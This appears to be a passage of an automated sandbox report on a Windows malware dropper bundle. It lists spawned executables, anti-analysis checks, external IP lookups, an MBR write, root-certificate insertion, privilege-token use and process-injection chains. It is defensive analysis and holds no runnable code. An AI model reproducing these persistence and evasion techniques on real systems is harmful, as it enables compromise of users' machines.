N/A N/A C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\siww1049.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\note6060.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8865F.tmp\setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\inst200.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Public\SteamKeyGen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udontsay.exe N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-8865F.tmp\setup.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Service.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A checkip.amazonaws.com N/A N/A
N/A checkip.amazonaws.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Pictures\Adobe Films\8AyDk7NAPV0v24oDY1Q7VVXZ.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe C:\Users\Admin\AppData\Local\Temp\Service.exe N/A
File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe C:\Users\Admin\AppData\Local\Temp\Service.exe N/A

Enumerates physical storage devices

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe N/A
N/A N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe N/A
N/A N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe N/A
N/A N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe N/A
N/A N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe N/A
N/A N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe N/A
N/A N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe N/A
N/A N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3468 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe
PID 3468 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe
PID 3468 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe
PID 3468 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Windows\SysWOW64\schtasks.exe
PID 3468 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Windows\SysWOW64\schtasks.exe
PID 3468 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Windows\SysWOW64\schtasks.exe
PID 3468 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Windows\SysWOW64\schtasks.exe
PID 3468 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Windows\SysWOW64\schtasks.exe
PID 3468 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 3300 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe
PID 1228 wrote to memory of 3300 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe
PID 1228 wrote to memory of 2960 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\8AyDk7NAPV0v24oDY1Q7VVXZ.exe
PID 1228 wrote to memory of 2960 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\8AyDk7NAPV0v24oDY1Q7VVXZ.exe
PID 1228 wrote to memory of 2960 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\8AyDk7NAPV0v24oDY1Q7VVXZ.exe
PID 1228 wrote to memory of 2032 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\dOaBjSg8mYjqYth2dayxRNWl.exe
PID 1228 wrote to memory of 2032 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\dOaBjSg8mYjqYth2dayxRNWl.exe
PID 1228 wrote to memory of 2032 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\dOaBjSg8mYjqYth2dayxRNWl.exe
PID 1228 wrote to memory of 3600 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\cZSRSHgTd8DlJEacM46ocVuM.exe
PID 1228 wrote to memory of 3600 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\cZSRSHgTd8DlJEacM46ocVuM.exe
PID 1228 wrote to memory of 3600 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\cZSRSHgTd8DlJEacM46ocVuM.exe
PID 1228 wrote to memory of 3984 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe
PID 1228 wrote to memory of 3984 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe
PID 1228 wrote to memory of 3984 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe
PID 3984 wrote to memory of 4192 N/A C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe
PID 3984 wrote to memory of 4192 N/A C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe
PID 3984 wrote to memory of 4192 N/A C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe
PID 1228 wrote to memory of 4248 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe
PID 1228 wrote to memory of 4248 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe
PID 1228 wrote to memory of 4248 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe
PID 3600 wrote to memory of 4344 N/A C:\Users\Admin\Pictures\Adobe Films\cZSRSHgTd8DlJEacM46ocVuM.exe C:\Users\Admin\AppData\Local\Temp\7zSF25C.tmp\Install.exe
PID 3600 wrote to memory of 4344 N/A C:\Users\Admin\Pictures\Adobe Films\cZSRSHgTd8DlJEacM46ocVuM.exe C:\Users\Admin\AppData\Local\Temp\7zSF25C.tmp\Install.exe
PID 3600 wrote to memory of 4344 N/A C:\Users\Admin\Pictures\Adobe Films\cZSRSHgTd8DlJEacM46ocVuM.exe C:\Users\Admin\AppData\Local\Temp\7zSF25C.tmp\Install.exe
PID 4248 wrote to memory of 4336 N/A C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe C:\Users\Admin\AppData\Local\Temp\is-N4MTP.tmp\SUsOP56v2IWwb71Bz51Cg1sx.tmp
PID 4248 wrote to memory of 4336 N/A C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe C:\Users\Admin\AppData\Local\Temp\is-N4MTP.tmp\SUsOP56v2IWwb71Bz51Cg1sx.tmp
PID 4248 wrote to memory of 4336 N/A C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe C:\Users\Admin\AppData\Local\Temp\is-N4MTP.tmp\SUsOP56v2IWwb71Bz51Cg1sx.tmp
PID 1228 wrote to memory of 4508 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Windows\SysWOW64\cmd.exe
PID 1228 wrote to memory of 4508 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Windows\SysWOW64\cmd.exe
PID 1228 wrote to memory of 4508 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Windows\SysWOW64\cmd.exe
PID 4336 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\is-N4MTP.tmp\SUsOP56v2IWwb71Bz51Cg1sx.tmp C:\Users\Admin\AppData\Local\Temp\is-IQ2D1.tmp\5(6665____.exe
PID 4336 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\is-N4MTP.tmp\SUsOP56v2IWwb71Bz51Cg1sx.tmp C:\Users\Admin\AppData\Local\Temp\is-IQ2D1.tmp\5(6665____.exe
PID 4532 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\is-IQ2D1.tmp\5(6665____.exe C:\Windows\system32\fondue.exe
PID 4532 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\is-IQ2D1.tmp\5(6665____.exe C:\Windows\system32\fondue.exe
PID 4344 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\7zSF25C.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe
PID 4344 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\7zSF25C.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe
PID 4344 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\7zSF25C.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe
PID 4880 wrote to memory of 4900 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4880 wrote to memory of 4900 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4880 wrote to memory of 4900 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4508 wrote to memory of 4924 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe
PID 4508 wrote to memory of 4924 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe
PID 4508 wrote to memory of 4924 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe
PID 4508 wrote to memory of 5004 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe
PID 4508 wrote to memory of 5004 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe
